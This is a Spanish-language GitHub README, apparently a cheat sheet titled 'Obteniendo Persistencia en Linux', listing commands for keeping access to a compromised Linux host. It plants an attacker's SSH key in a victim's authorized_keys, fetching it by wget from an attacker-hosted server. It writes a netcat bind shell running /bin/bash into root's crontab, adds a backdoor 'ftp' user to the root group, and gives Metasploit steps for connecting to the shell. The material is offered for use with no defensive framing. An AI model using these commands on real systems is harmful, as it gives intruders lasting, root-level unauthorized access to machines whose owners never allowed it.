Skip to content

TheRealCiscoo/LinuxPersistence

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 

Repository files navigation

Obteniendo Persistencia en Linux

Malicious SSH Key [ con credenciales ]

Generación de par de claves

**ssh-keygen** -t rsa -b 4096

*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*

Tranferencia de la clave pública al usuario comprometido

**ssh-copy-id** *<victim-user>***@***<target-ip-or-hostname>

# Se solicitará la contraseña del usuario*

Conexión con SSH

**ssh** *<victim-user>***@***<target-ip-or-hostname>*

Malicious SSH Key [ sin credenciales ]

Generación de par de claves

**ssh-keygen** -t rsa -b 4096

*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*

Inicialización de servidor Python

**cd** ~/.ssh/
**
**python3** -m http.server 80

*# Alternativa con Python2.7*
**python2** -m SimpleHTTPServer 80

Descargar archivo [ máquina atacante ]

**wget** http://*<attacker-ip>/id_rsa.pub*

**cat** *id_rsa.pub >> .ssh/authorized_keys*

Malicious Crontab

Creación de bindshell

**echo** 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell

Creación de crontab maliciosa

**echo '*** * * * * /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root

New User

Creación de nuevo usuario

**adduser** -m ****user -s /bin/bash **ftp**

Cambio de contraseña

**passwd** ftp

Agregar el usuario a grupo root

**usermod** -aG root **ftp**

Extra

Obteniendo conexión con Bindshell

**use** payload/generic/shell_bind_tcp

**set** RHOST <target-ip>

**set** LPORT <local-port>

**exploit**

Obteniendo conexión con Bindshell

*# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano*

**sessions** -l
**
**sessions** -u <session-id>

**sessions** <session-id>

About

Técnicas para ganar persistencia en Linux

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published